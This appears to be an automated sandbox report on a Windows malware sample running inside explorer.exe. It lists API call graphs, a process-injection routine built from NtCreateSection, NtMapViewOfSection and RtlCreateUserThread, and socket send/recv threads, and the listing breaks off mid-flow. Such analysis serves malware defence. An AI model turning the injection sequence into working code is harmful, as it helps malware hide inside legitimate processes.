                                                                            execution_graph 17208 c0c4d0 17209 c0c4d5 RtlFreeHeap 17208->17209 17213 c0c505 free 17208->17213 17210 c0c4f0 17209->17210 17209->17213 17214 c0a940 17210->17214 17217 c0abe4 GetLastError FlsGetValue 17214->17217 17216 c0a949 GetLastError 17216->17213 17218 c0ac52 SetLastError 17217->17218 17219 c0ac0a 17217->17219 17218->17216 17229 c1061c 17219->17229 17221 c0ac17 17221->17218 17222 c0ac1f FlsSetValue 17221->17222 17223 c0ac35 17222->17223 17224 c0ac4b 17222->17224 17234 c0ab2c 17223->17234 17243 c0c4d0 17224->17243 17228 c0ac50 17228->17218 17231 c10641 17229->17231 17232 c10681 17231->17232 17233 c1065f Sleep 17231->17233 17249 c12cbc 17231->17249 17232->17221 17233->17231 17233->17232 17259 c10b64 17234->17259 17244 c0c4d5 RtlFreeHeap 17243->17244 17248 c0c505 free 17243->17248 17245 c0c4f0 17244->17245 17244->17248 17246 c0a940 _errno 60 API calls 17245->17246 17247 c0c4f5 GetLastError 17246->17247 17247->17248 17248->17228 17250 c12cd1 17249->17250 17255 c12cee 17249->17255 17251 c12cdf 17250->17251 17250->17255 17253 c0a940 _errno 61 API calls 17251->17253 17252 c12d06 HeapAlloc 17254 c12ce4 17252->17254 17252->17255 17253->17254 17254->17231 17255->17252 17255->17254 17257 c0c738 DecodePointer 17255->17257 17258 c0c753 17257->17258 17258->17255 17260 c10b93 EnterCriticalSection 17259->17260 17261 c10b82 17259->17261 17265 c10a7c 17261->17265 17266 c10aa3 17265->17266 17267 c10aba 17265->17267 17297 c0eaec 17266->17297 17279 c10acf 17267->17279 17346 c1059c 17267->17346 17274 c10ae5 17277 c0a940 _errno 60 API calls 17274->17277 17275 c10af4 17278 c10b64 _lock 60 API calls 17275->17278 17277->17279 17280 c10afe 17278->17280 17279->17260 17290 c0e838 17279->17290 17281 c10b37 17280->17281 17282 c10b0a InitializeCriticalSectionAndSpinCount 17280->17282 17285 c0c4d0 free 60 API calls 17281->17285 17283 c10b26 LeaveCriticalSection 17282->17283 17284 c10b19 17282->17284 17283->17279 17286 c0c4d0 free 60 API calls 17284->17286 17285->17283 17288 c10b21 17286->17288 17289 c0a940 _errno 60 API calls 17288->17289 17289->17283 17291 c0eaec _FF_MSGBANNER 62 API calls 17290->17291 17292 c0e845 17291->17292 17293 c0e88c _FF_MSGBANNER 62 API calls 17292->17293 17294 c0e84c 17293->17294 17448 c0e670 17294->17448 17351 c12598 17297->17351 17300 c0e88c _FF_MSGBANNER 62 API calls 17302 c0eb20 17300->17302 17301 c12598 _set_error_mode 62 API calls 17303 c0eb09 17301->17303 17304 c0e88c _FF_MSGBANNER 62 API calls 17302->17304 17303->17300 17305 c0eb2a 17303->17305 17304->17305 17306 c0e88c 17305->17306 17307 c0e8c0 _FF_MSGBANNER 17306->17307 17308 c0ea12 17307->17308 17309 c12598 _set_error_mode 59 API calls 17307->17309 17415 c0c4b0 17308->17415 17311 c0e8d6 17309->17311 17313 c0ea54 GetStdHandle 17311->17313 17314 c12598 _set_error_mode 59 API calls 17311->17314 17312 c0eacc 17343 c0e4dc 17312->17343 17313->17308 17316 c0ea67 _snprintf 17313->17316 17315 c0e8e7 17314->17315 17315->17308 17315->17313 17370 c1252c 17315->17370 17316->17308 17318 c0eaa1 WriteFile 17316->17318 17318->17308 17320 c0ea40 17323 c0a834 _fltout2 16 API calls 17320->17323 17321 c0e92d GetModuleFileNameW 17322 c0e953 17321->17322 17328 c0e97c _FF_MSGBANNER 17321->17328 17324 c1252c _FF_MSGBANNER 59 API calls 17322->17324 17325 c0ea53 17323->17325 17326 c0e964 17324->17326 17325->17313 17326->17328 17329 c0a834 _fltout2 16 API calls 17326->17329 17327 c0e9d4 17388 c123d4 17327->17388 17328->17327 17379 c1245c 17328->17379 17329->17328 17333 c123d4 _FF_MSGBANNER 59 API calls 17336 c0e9f9 17333->17336 17335 c0a834 _fltout2 16 API calls 17335->17320 17337 c0ea17 17336->17337 17338 c0e9fd 17336->17338 17341 c0a834 _fltout2 16 API calls 17337->17341 17397 c121cc 17338->17397 17339 c0a834 _fltout2 16 API calls 17339->17327 17342 c0ea2b 17341->17342 17342->17335 17428 c0e4a0 GetModuleHandleW 17343->17428 17347 c105c4 17346->17347 17349 c105fc 17347->17349 17350 c105d8 Sleep 17347->17350 17431 c0c678 17347->17431 17349->17274 17349->17275 17350->17347 17350->17349 17352 c125a0 17351->17352 17353 c0a940 _errno 62 API calls 17352->17353 17354 c0eafa 17352->17354 17355 c125c5 17353->17355 17354->17301 17354->17303 17357 c0a8d8 17355->17357 17360 c0a868 DecodePointer 17357->17360 17361 c0a8a6 17360->17361 17362 c0a8c7 17360->17362 17361->17354 17367 c0a834 17362->17367 17368 c0a6e8 _fltout2 14 API calls 17367->17368 17369 c0a84c GetCurrentProcess TerminateProcess 17368->17369 17371 c12547 17370->17371 17372 c1253d 17370->17372 17373 c0a940 _errno 62 API calls 17371->17373 17372->17371 17374 c12564 17372->17374 17378 c12550 17373->17378 17376 c0e923 17374->17376 17377 c0a940 _errno 62 API calls 17374->17377 17375 c0a8d8 _invalid_parameter_noinfo 17 API calls 17375->17376 17376->17320 17376->17321 17377->17378 17378->17375 17383 c1246c 17379->17383 17380 c12471 17381 c0a940 _errno 62 API calls 17380->17381 17382 c0e9bc 17380->17382 17387 c1249b 17381->17387 17382->17327 17382->17339 17383->17380 17383->17382 17385 c124af 17383->17385 17384 c0a8d8 _invalid_parameter_noinfo 17 API calls 17384->17382 17385->17382 17386 c0a940 _errno 62 API calls 17385->17386 17386->17387 17387->17384 17389 c123ef 17388->17389 17391 c123e5 17388->17391 17390 c0a940 _errno 62 API calls 17389->17390 17396 c123f8 17390->17396 17391->17389 17393 c12426 17391->17393 17392 c0a8d8 _invalid_parameter_noinfo 17 API calls 17394 c0e9e7 17392->17394 17393->17394 17395 c0a940 _errno 62 API calls 17393->17395 17394->17333 17394->17342 17395->17396 17396->17392 17426 c0aaf8 EncodePointer 17397->17426 17416 c0c4b9 17415->17416 17417 c0c4c4 17416->17417 17418 c10da4 RtlCaptureContext RtlLookupFunctionEntry 17416->17418 17417->17312 17419 c10e29 17418->17419 17420 c10de8 RtlVirtualUnwind 17418->17420 17421 c10e4b IsDebuggerPresent 17419->17421 17420->17421 17427 c10950 17421->17427 17423 c10eaa SetUnhandledExceptionFilter UnhandledExceptionFilter 17424 c10ed2 GetCurrentProcess TerminateProcess 17423->17424 17425 c10ec8 _cftoe_l 17423->17425 17424->17312 17425->17424 17427->17423 17429 c0e4cf ExitProcess 17428->17429 17430 c0e4ba GetProcAddress 17428->17430 17430->17429 17432 c0c70c 17431->17432 17443 c0c690 17431->17443 17433 c0c738 _callnewh DecodePointer 17432->17433 17434 c0c711 17433->17434 17436 c0a940 _errno 61 API calls 17434->17436 17435 c0c6c8 HeapAlloc 17437 c0c701 17435->17437 17435->17443 17436->17437 17437->17347 17438 c0eaec _FF_MSGBANNER 61 API calls 17445 c0c6a8 17438->17445 17439 c0c6f1 17441 c0a940 _errno 61 API calls 17439->17441 17440 c0c738 _callnewh DecodePointer 17440->17443 17444 c0c6f6 17441->17444 17442 c0e88c _FF_MSGBANNER 61 API calls 17442->17445 17443->17435 17443->17439 17443->17440 17443->17444 17443->17445 17447 c0a940 _errno 61 API calls 17444->17447 17445->17435 17445->17438 17445->17442 17446 c0e4dc malloc 3 API calls 17445->17446 17446->17445 17447->17437 17449 c10b64 _lock 56 API calls 17448->17449 17450 c0e69e 17449->17450 17451 c0e6c5 DecodePointer 17450->17451 17455 c0e786 _initterm 17450->17455 17452 c0e6e3 DecodePointer 17451->17452 17451->17455 17464 c0e708 17452->17464 17456 c0e7bc 17455->17456 17468 c10a64 LeaveCriticalSection 17455->17468 17458 c0e7e7 17456->17458 17469 c10a64 LeaveCriticalSection 17456->17469 17462 c0e727 DecodePointer 17467 c0aaf8 EncodePointer 17462->17467 17464->17455 17464->17462 17465 c0e73d DecodePointer DecodePointer 17464->17465 17466 c0aaf8 EncodePointer 17464->17466 17465->17464 20647 c034e0 20650 c03510 20647->20650 20648 c0353b 20649 c04620 5 API calls 20649->20650 20650->20648 20650->20649 20652 c033b0 send 20650->20652 20652->20650 17470 bf908b 17471 bf909b 17470->17471 17472 bf90ad 17471->17472 17473 bf9193 LoadLibraryExW 17471->17473 17476 bf90b7 17472->17476 17477 bf9131 GetProcAddress 17472->17477 17474 bf91ba 17473->17474 17475 bf91b3 17473->17475 17480 bf91e9 17474->17480 17481 bf92d5 LoadLibraryW 17474->17481 17482 bf90e4 GetProcAddress 17476->17482 17478 bf918e 17477->17478 17479 bf9128 17477->17479 17478->17473 17479->17475 17485 bf91f3 17480->17485 17486 bf9270 GetProcAddress 17480->17486 17481->17475 17484 bf92f6 17481->17484 17482->17479 17483 bf912f 17482->17483 17483->17478 17488 bf940b LoadLibraryW 17484->17488 17489 bf9325 17484->17489 17490 bf9220 GetProcAddress 17485->17490 17486->17479 17487 bf92d0 17486->17487 17487->17481 17488->17475 17491 bf9432 17488->17491 17492 bf932f 17489->17492 17493 bf93a9 GetProcAddress 17489->17493 17490->17479 17494 bf926e 17490->17494 17496 bf954d LoadLibraryExW 17491->17496 17497 bf9461 17491->17497 17498 bf935c GetProcAddress 17492->17498 17493->17479 17495 bf9406 17493->17495 17494->17487 17495->17488 17496->17475 17499 bf956e 17496->17499 17500 bf946b 17497->17500 17501 bf94e8 GetProcAddress 17497->17501 17498->17479 17502 bf93a7 17498->17502 17505 bf959d 17499->17505 17506 bf9683 LoadLibraryExW 17499->17506 17504 bf9498 GetProcAddress 17500->17504 17501->17479 17503 bf9548 17501->17503 17502->17495 17503->17496 17504->17479 17507 bf94e6 17504->17507 17508 bf95a7 17505->17508 17509 bf9621 GetProcAddress 17505->17509 17506->17475 17510 bf96aa 17506->17510 17507->17503 17512 bf95d4 GetProcAddress 17508->17512 17509->17479 17511 bf967e 17509->17511 17513 bf96d9 17510->17513 17514 bf97c5 LoadLibraryExW 17510->17514 17511->17506 17512->17479 17515 bf961f 17512->17515 17516 bf96e3 17513->17516 17517 bf9760 GetProcAddress 17513->17517 17514->17475 17518 bf97e6 17514->17518 17515->17511 17522 bf9710 GetProcAddress 17516->17522 17517->17479 17519 bf97c0 17517->17519 17520 bf98fb LoadLibraryExW 17518->17520 17521 bf9815 17518->17521 17519->17514 17520->17475 17526 bf991c 17520->17526 17523 bf981f 17521->17523 17524 bf9899 GetProcAddress 17521->17524 17522->17479 17525 bf975e 17522->17525 17528 bf984c GetProcAddress 17523->17528 17524->17479 17527 bf98f6 17524->17527 17525->17519 17529 bf9a31 LoadLibraryExW 17526->17529 17532 bf99cf GetProcAddress 17526->17532 17533 bf9955 17526->17533 17527->17520 17528->17479 17530 bf9897 17528->17530 17529->17475 17531 bf9a52 17529->17531 17530->17527 17535 bf9b67 LoadLibraryExW 17531->17535 17536 bf9a81 17531->17536 17532->17479 17534 bf99cd 17532->17534 17537 bf9982 GetProcAddressForCaller 17533->17537 17534->17529 17535->17475 17544 bf9b88 17535->17544 17538 bf9a8b 17536->17538 17539 bf9b05 GetProcAddress 17536->17539 17537->17475 17537->17534 17541 bf9ab8 GetProcAddress 17538->17541 17539->17479 17540 bf9b62 17539->17540 17540->17535 17541->17479 17543 bf9b03 17541->17543 17542 bf9c38 GetProcAddress 17542->17479 17542->17544 17543->17540 17544->17475 17546 bf9bb7 17544->17546 17545 bf9bee GetProcAddress 17545->17479 17545->17546 17546->17542 17546->17544 17546->17545 20086 c02286 20088 c022a0 20086->20088 20087 c0238c 20089 c02395 20087->20089 20090 c0239a 20087->20090 20088->20087 20091 bfddc0 3 API calls 20088->20091 20092 bef200 106 API calls 20089->20092 20093 c023a3 20090->20093 20094 c023a8 20090->20094 20095 c022b2 20091->20095 20092->20090 20096 beee80 127 API calls 20093->20096 20097 c023b6 20094->20097 20098 bfc130 10 API calls 20094->20098 20095->20087 20099 bef510 96 API calls 20095->20099 20096->20094 20100 bf6790 110 API calls 20097->20100 20098->20097 20101 c022e6 20099->20101 20102 c023c0 20100->20102 20101->20087 20106 c08378 89 API calls 20101->20106 20103 c02432 WSAStartup 20102->20103 20104 c023c9 CreateEventW 20102->20104 20105 c02445 20103->20105 20114 c024b0 20103->20114 20104->20103 20107 c023ed CreateThread 20104->20107 20110 c0247a CreateThread 20105->20110 20111 c0244e CreateThread 20105->20111 20112 c02348 20106->20112 20108 c02423 20107->20108 20109 c02425 CloseHandle 20107->20109 20108->20103 20109->20103 20110->20114 20115 c024b7 WSACleanup 20110->20115 20117 c05d20 277 API calls Concurrency::details::platform::__ChangeTimerQueueTimer 20110->20117 20111->20110 20113 be7ef0 120 API calls 20112->20113 20116 c0237e LocalFree 20113->20116 20115->20114 20116->20087 20780 be4af4 20791 be4827 20780->20791 20781 be4cba WaitForSingleObject 20783 be4cda 20781->20783 20781->20791 20782 be4da0 104 API calls 20782->20791 20784 be4d8d 20783->20784 20785 be4d2a LocalFree 20783->20785 20785->20783 20786 be4bab LocalFree 20790 be4710 93 API calls 20786->20790 20787 be4c57 LocalFree 20787->20791 20788 be4868 LocalFree 20788->20791 20789 be4670 90 API calls 20789->20791 20790->20791 20791->20781 20791->20782 20791->20783 20791->20786 20791->20787 20791->20788 20791->20789 20792 bf9cb0 85 API calls 20791->20792 20792->20791 20217 bf7af0 20218 bf7b16 20217->20218 20230 bf7b30 20217->20230 20219 bf7b1d 20218->20219 20220 bf7b34 20218->20220 20221 bf7b24 20219->20221 20222 bf7b40 20219->20222 20223 befba0 114 API calls 20220->20223 20224 bf7b2e DefWindowProcW 20221->20224 20225 bf7b4c 20221->20225 20226 befba0 114 API calls 20222->20226 20231 bf7b39 20223->20231 20224->20230 20227 bf7b54 20225->20227 20225->20230 20226->20231 20229 befba0 114 API calls 20227->20229 20229->20231 20231->20230 20118 bf8ce3 20119 bf8cf3 20118->20119 20120 bf8df1 LoadLibraryW 20119->20120 20121 bf8d0f 20119->20121 20122 bf8d8c GetProcAddress 20119->20122 20123 bf8e12 20120->20123 20153 bf8d83 20120->20153 20127 bf8d3c GetProcAddressForCaller 20121->20127 20124 bf8d8a 20122->20124 20152 bf8de5 20122->20152 20125 bf8f27 LoadLibraryW 20123->20125 20126 bf8e41 20123->20126 20124->20120 20130 bf8f48 20125->20130 20125->20153 20128 bf8e4b 20126->20128 20129 bf8ec5 GetProcAddress 20126->20129 20127->20124 20127->20153 20132 bf8e78 GetProcAddress 20128->20132 20131 bf8f22 20129->20131 20129->20152 20133 bf905d LoadLibraryW 20130->20133 20134 bf8f77 20130->20134 20131->20125 20135 bf8ec3 20132->20135 20132->20152 20136 bf907e 20133->20136 20133->20153 20137 bf8ffb GetProcAddress 20134->20137 20138 bf8f81 20134->20138 20135->20131 20141 bf90ad 20136->20141 20142 bf9193 LoadLibraryExW 20136->20142 20139 bf9058 20137->20139 20137->20152 20140 bf8fae GetProcAddress 20138->20140 20139->20133 20143 bf8ff9 20140->20143 20140->20152 20145 bf90b7 20141->20145 20146 bf9131 GetProcAddress 20141->20146 20144 bf91ba 20142->20144 20142->20153 20143->20139 20148 bf91e9 20144->20148 20149 bf92d5 LoadLibraryW 20144->20149 20150 bf90e4 GetProcAddress 20145->20150 20147 bf918e 20146->20147 20146->20152 20147->20142 20155 bf91f3 20148->20155 20156 bf9270 GetProcAddress 20148->20156 20149->20153 20154 bf92f6 20149->20154 20151 bf912f 20150->20151 20150->20152 20151->20147 20152->20153 20158 bf940b LoadLibraryW 20154->20158 20159 bf9325 20154->20159 20160 bf9220 GetProcAddress 20155->20160 20156->20152 20157 bf92d0 20156->20157 20157->20149 20158->20153 20161 bf9432 20158->20161 20162 bf932f 20159->20162 20163 bf93a9 GetProcAddress 20159->20163 20160->20152 20164 bf926e 20160->20164 20166 bf954d LoadLibraryExW 20161->20166 20167 bf9461 20161->20167 20168 bf935c GetProcAddress 20162->20168 20163->20152 20165 bf9406 20163->20165 20164->20157 20165->20158 20166->20153 20169 bf956e 20166->20169 20170 bf946b 20167->20170 20171 bf94e8 GetProcAddress 20167->20171 20168->20152 20172 bf93a7 20168->20172 20175 bf959d 20169->20175 20176 bf9683 LoadLibraryExW 20169->20176 20174 bf9498 GetProcAddress 20170->20174 20171->20152 20173 bf9548 20171->20173 20172->20165 20173->20166 20174->20152 20177 bf94e6 20174->20177 20178 bf95a7 20175->20178 20179 bf9621 GetProcAddress 20175->20179 20176->20153 20180 bf96aa 20176->20180 20177->20173 20182 bf95d4 GetProcAddress 20178->20182 20179->20152 20181 bf967e 20179->20181 20183 bf96d9 20180->20183 20184 bf97c5 LoadLibraryExW 20180->20184 20181->20176 20182->20152 20185 bf961f 20182->20185 20186 bf96e3 20183->20186 20187 bf9760 GetProcAddress 20183->20187 20184->20153 20188 bf97e6 20184->20188 20185->20181 20192 bf9710 GetProcAddress 20186->20192 20187->20152 20189 bf97c0 20187->20189 20190 bf98fb LoadLibraryExW 20188->20190 20191 bf9815 20188->20191 20189->20184 20190->20153 20196 bf991c 20190->20196 20193 bf981f 20191->20193 20194 bf9899 GetProcAddress 20191->20194 20192->20152 20195 bf975e 20192->20195 20198 bf984c GetProcAddress 20193->20198 20194->20152 20197 bf98f6 20194->20197 20195->20189 20199 bf9a31 LoadLibraryExW 20196->20199 20202 bf99cf GetProcAddress 20196->20202 20203 bf9955 20196->20203 20197->20190 20198->20152 20200 bf9897 20198->20200 20199->20153 20201 bf9a52 20199->20201 20200->20197 20205 bf9b67 LoadLibraryExW 20201->20205 20206 bf9a81 20201->20206 20202->20152 20204 bf99cd 20202->20204 20207 bf9982 GetProcAddressForCaller 20203->20207 20204->20199 20205->20153 20214 bf9b88 20205->20214 20208 bf9a8b 20206->20208 20209 bf9b05 GetProcAddress 20206->20209 20207->20153 20207->20204 20211 bf9ab8 GetProcAddress 20208->20211 20209->20152 20210 bf9b62 20209->20210 20210->20205 20211->20152 20213 bf9b03 20211->20213 20212 bf9c38 GetProcAddress 20212->20152 20212->20214 20213->20210 20214->20153 20216 bf9bb7 20214->20216 20215 bf9bee GetProcAddress 20215->20152 20215->20216 20216->20212 20216->20214 20216->20215 22052 c16a00 22055 bf33a0 VariantClear 22052->22055 22054 c16a15 22055->22054 22983 c033f0 22986 c03420 22983->22986 22984 c0344b 22985 c04500 5 API calls 22985->22986 22986->22984 22986->22985 22988 c03370 recv 22986->22988 22988->22986 17547 c09784 GetStartupInfoW 17548 c097b3 17547->17548 17592 c0f5ac HeapCreate 17548->17592 17551 c0981a 17597 c0adc0 17551->17597 17553 c09801 17557 c0eaec _FF_MSGBANNER 62 API calls 17553->17557 17554 c09806 17555 c0e88c _FF_MSGBANNER 62 API calls 17554->17555 17558 c09810 17555->17558 17557->17554 17560 c0e4dc malloc 3 API calls 17558->17560 17560->17551 17593 c0f5d4 GetVersion 17592->17593 17594 c097f4 17592->17594 17595 c0f5f8 17593->17595 17596 c0f5de HeapSetInformation 17593->17596 17594->17551 17594->17553 17594->17554 17595->17594 17596->17595 17704 c0e50c 17597->17704 17707 c0aaf8 EncodePointer 17704->17707 20041 bf957b 20042 bf958b 20041->20042 20043 bf959d 20042->20043 20044 bf9683 LoadLibraryExW 20042->20044 20045 bf95a7 20043->20045 20046 bf9621 GetProcAddress 20043->20046 20047 bf96aa 20044->20047 20065 bf96a3 20044->20065 20049 bf95d4 GetProcAddress 20045->20049 20048 bf967e 20046->20048 20055 bf9618 20046->20055 20050 bf96d9 20047->20050 20051 bf97c5 LoadLibraryExW 20047->20051 20048->20044 20052 bf961f 20049->20052 20049->20055 20053 bf96e3 20050->20053 20054 bf9760 GetProcAddress 20050->20054 20057 bf97e6 20051->20057 20051->20065 20052->20048 20060 bf9710 GetProcAddress 20053->20060 20054->20055 20056 bf97c0 20054->20056 20055->20065 20056->20051 20058 bf98fb LoadLibraryExW 20057->20058 20059 bf9815 20057->20059 20064 bf991c 20058->20064 20058->20065 20061 bf981f 20059->20061 20062 bf9899 GetProcAddress 20059->20062 20060->20055 20063 bf975e 20060->20063 20067 bf984c GetProcAddress 20061->20067 20062->20055 20066 bf98f6 20062->20066 20063->20056 20068 bf9a31 LoadLibraryExW 20064->20068 20071 bf99cf GetProcAddress 20064->20071 20072 bf9955 20064->20072 20066->20058 20067->20055 20069 bf9897 20067->20069 20068->20065 20070 bf9a52 20068->20070 20069->20066 20074 bf9b67 LoadLibraryExW 20070->20074 20075 bf9a81 20070->20075 20071->20055 20073 bf99cd 20071->20073 20076 bf9982 GetProcAddressForCaller 20072->20076 20073->20068 20074->20065 20083 bf9b88 20074->20083 20077 bf9a8b 20075->20077 20078 bf9b05 GetProcAddress 20075->20078 20076->20065 20076->20073 20080 bf9ab8 GetProcAddress 20077->20080 20078->20055 20079 bf9b62 20078->20079 20079->20074 20080->20055 20082 bf9b03 20080->20082 20081 bf9c38 GetProcAddress 20081->20055 20081->20083 20082->20079 20083->20065 20085 bf9bb7 20083->20085 20084 bf9bee GetProcAddress 20084->20055 20084->20085 20085->20081 20085->20083 20085->20084 20232 bfc360 20233 bfc386 20232->20233 20247 bfc3a0 20232->20247 20234 bfc38d 20233->20234 20235 bfc3a4 20233->20235 20237 bfc394 20234->20237 20238 bfc3b0 20234->20238 20236 bef200 106 API calls 20235->20236 20239 bfc3a9 20236->20239 20241 bfc39e DefWindowProcW 20237->20241 20242 bfc3bc 20237->20242 20240 bef200 106 API calls 20238->20240 20239->20247 20240->20239 20241->20247 20243 bfc3c4 20242->20243 20244 bfc3d0 20242->20244 20246 bef200 106 API calls 20243->20246 20244->20247 20248 bef370 6 API calls 20244->20248 20246->20239 20248->20247

                                                                            Executed Functions

                                                                            Function 00BF0740 Relevance: 145.7, APIs: 60, Strings: 23, Instructions: 432nativestringlibraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 69 bf0740-bf079c call c01f90 72 bf079e-bf07a9 69->72 73 bf07ab 69->73 74 bf07b6-bf0823 CreateProcessW 72->74 73->74 75 bf1299 74->75 76 bf0829-bf08e6 GetModuleHandleW GetProcAddress * 5 GetCurrentProcess 74->76 77 bf129b-bf12a2 75->77 78 bf125d-bf1262 76->78 79 bf08ec-bf08f5 76->79 78->75 81 bf1264-bf1290 TerminateProcess CloseHandle * 2 78->81 79->78 80 bf08fb-bf0904 79->80 80->78 82 bf090a-bf0913 80->82 81->75 82->78 83 bf0919-bf0922 82->83 83->78 84 bf0928-bf09cc NtCreateSection 83->84 84->78 85 bf09d2-bf0a52 GetCurrentProcess NtMapViewOfSection 84->85 86 bf124f-bf1257 NtClose 85->86 87 bf0a58-bf0ac8 NtMapViewOfSection 85->87 86->78 88 bf0ace-bf0b47 NtCreateSection 87->88 89 bf1239-bf1249 NtUnmapViewOfSection 87->89 88->89 90 bf0b4d-bf0bd0 GetCurrentProcess NtMapViewOfSection 88->90 89->86 91 bf122b-bf1233 NtClose 90->91 92 bf0bd6-bf0c46 NtMapViewOfSection 90->92 91->89 93 bf0c4c-bf0e8b call c08b30 LoadLibraryW GetProcAddress * 2 lstrcpyW * 2 lstrcpyA * 9 NtCreateSection 92->93 94 bf1215-bf1225 NtUnmapViewOfSection 92->94 93->94 97 bf0e91-bf0f14 GetCurrentProcess NtMapViewOfSection 93->97 94->91 98 bf0f1a-bf0f8a NtMapViewOfSection 97->98 99 bf1207-bf120f NtClose 97->99 100 bf11f1-bf1201 NtUnmapViewOfSection 98->100 101 bf0f90-bf1010 call c08b30 CreateEventW 98->101 99->94 100->99 101->100 104 bf1016-bf1086 RtlCreateUserThread 101->104 105 bf108c-bf10e1 WaitForSingleObject 104->105 106 bf11e3-bf11eb CloseHandle 104->106 107 bf10e7-bf119f NtUnmapViewOfSection * 6 NtClose * 3 CloseHandle 105->107 108 bf11a6-bf11db TerminateProcess CloseHandle * 2 105->108 106->100 107->77 108->106
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Section$View$Close$lstrcpy$Unmap$AddressHandleProcProcess$Create$Current$Terminate$EventLibraryLoadModuleObjectSingleThreadUserWait
                                                                            • String ID: @$@$CloseHandle$GetProcAddress$KERNEL32.DLL$KERNEL32.DLL$LoadLibraryA$LoadLibraryW$LocalAlloc$LocalFree$MessageBoxW$NTDLL.DLL$NtClose$NtCreateSection$NtMapViewOfSection$NtUnmapViewOfSection$RtlCreateUserThread$Sleep$USER32.DLL$VirtualAlloc$VirtualFree$VirtualProtect$h
                                                                            • API String ID: 1065732154-2887914861
                                                                            • Opcode ID: bc1450d54a7e3ae3bddbcd0ebfc7df54fa7a22a4b3b051502df39f47e0664263
                                                                            • Instruction ID: 2dda2f112b3d71f83cd715188c62f2121c3eb8e0877f978f4dbf10079d76b499
                                                                            • Opcode Fuzzy Hash: bc1450d54a7e3ae3bddbcd0ebfc7df54fa7a22a4b3b051502df39f47e0664263
                                                                            • Instruction Fuzzy Hash: 0152A076208BC486EB71DF15F8A87DAB7A0F789794F501216DA8943B68DF7DC188CB40
                                                                            Function 00C05D20 Relevance: 89.6, APIs: 48, Strings: 3, Instructions: 308synchronizationCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 333 c05d20-c05d4b OpenEventW 334 c05d51-c05d61 333->334 335 c0635e-c06367 333->335 336 c05d63-c05d77 OpenMutexW 334->336 337 c05d7c-c05d83 334->337 336->337 338 c05d91-c05da1 337->338 339 c05d85-c05d8b 337->339 341 c05da3 338->341 342 c05da7-c05dc6 OpenMutexW 338->342 339->338 340 c06340-c06346 339->340 343 c06353-c06358 CloseHandle 340->343 344 c06348-c0634d CloseHandle 340->344 345 c05df2-c05e14 CreateEventW 341->345 342->340 346 c05dcc-c05de2 WaitForSingleObject 342->346 343->335 344->343 348 c06322-c06328 345->348 349 c05e1a-c05e3d 345->349 346->345 347 c05de4-c05dec 346->347 347->345 347->348 348->340 350 c0632a-c0633a ReleaseMutex CloseHandle 348->350 351 c05e89-c05e90 349->351 352 c05e3f-c05e47 349->352 350->340 353 c05e96-c05eaa WaitForSingleObject 351->353 354 c0629e-c062b0 WaitForSingleObject 351->354 355 c05e53-c05e5d 352->355 353->354 356 c05eb0-c05eb8 353->356 357 c062b2-c062c7 SetEvent WaitForSingleObject 354->357 358 c062cd-c062d3 354->358 355->351 359 c05e5f-c05e7b WaitForSingleObject 355->359 362 c05ef0-c05f23 SleepEx WaitForSingleObject 356->362 363 c05eba-c05ece WaitForSingleObject 356->363 357->358 364 c062d5-c062e0 CloseHandle 358->364 365 c062e9-c062ef 358->365 360 c05e87 359->360 361 c05e7d 359->361 360->355 367 c0630a-c06317 CloseHandle 361->367 369 c05f25-c05f32 WaitForSingleObject 362->369 370 c05f36-c05f3d 362->370 363->362 368 c05ed0-c05ee7 WaitForSingleObject 363->368 364->365 371 c062f1-c062fc CloseHandle 365->371 372 c06305 365->372 367->348 373 c05ee9 368->373 374 c05eee 368->374 369->370 375 c05f52-c05f5a 370->375 376 c05f3f-c05f47 370->376 371->372 372->367 377 c06305 call c06dd0 372->377 373->354 374->351 380 c05f60-c05f68 375->380 381 c06285 375->381 378 c05f49 376->378 379 c05f4d 376->379 377->367 382 c05f6e-c05f7e call c06f30 378->382 383 c06287-c06299 WaitForSingleObject 379->383 380->381 380->382 381->354 386 c05f84-c05fb1 setsockopt 382->386 387 c06257-c0625e 382->387 383->351 388 c05fb7-c05fd5 CreateEventW 386->388 389 c06209-c0620f 386->389 390 c06260-c06267 387->390 391 c06283 387->391 388->389 393 c05fdb-c05ffc LocalAlloc 388->393 394 c06211-c06226 shutdown closesocket 389->394 395 c0622c-c06255 CloseHandle call c01f90 389->395 390->391 392 c06269-c06270 390->392 391->383 392->391 396 c06272-c06279 392->396 397 c06002-c06047 CreateThread 393->397 398 c061f5-c06200 CloseHandle 393->398 394->395 395->391 396->391 400 c0627b-c0627d ExitProcess 396->400 401 c061dc-c061e5 397->401 402 c0604d-c0605d GetTickCount 397->402 398->389 401->398 404 c061e7-c061ef LocalFree 401->404 405 c06064-c0606b 402->405 404->398 406 c06071-c06079 405->406 407 c06173-c061be shutdown closesocket SetEvent WaitForSingleObject call c06dd0 405->407 409 c06096-c060aa WaitForSingleObject 406->409 410 c0607b-c0608f WaitForSingleObject 406->410 411 c061c3-c061d3 call bf3ae0 CloseHandle 407->411 413 c060b1-c060c5 WaitForSingleObject 409->413 414 c060ac 409->414 410->409 412 c06091 410->412 411->401 412->407 416 c060c7 413->416 417 c060cc-c060f6 call c03370 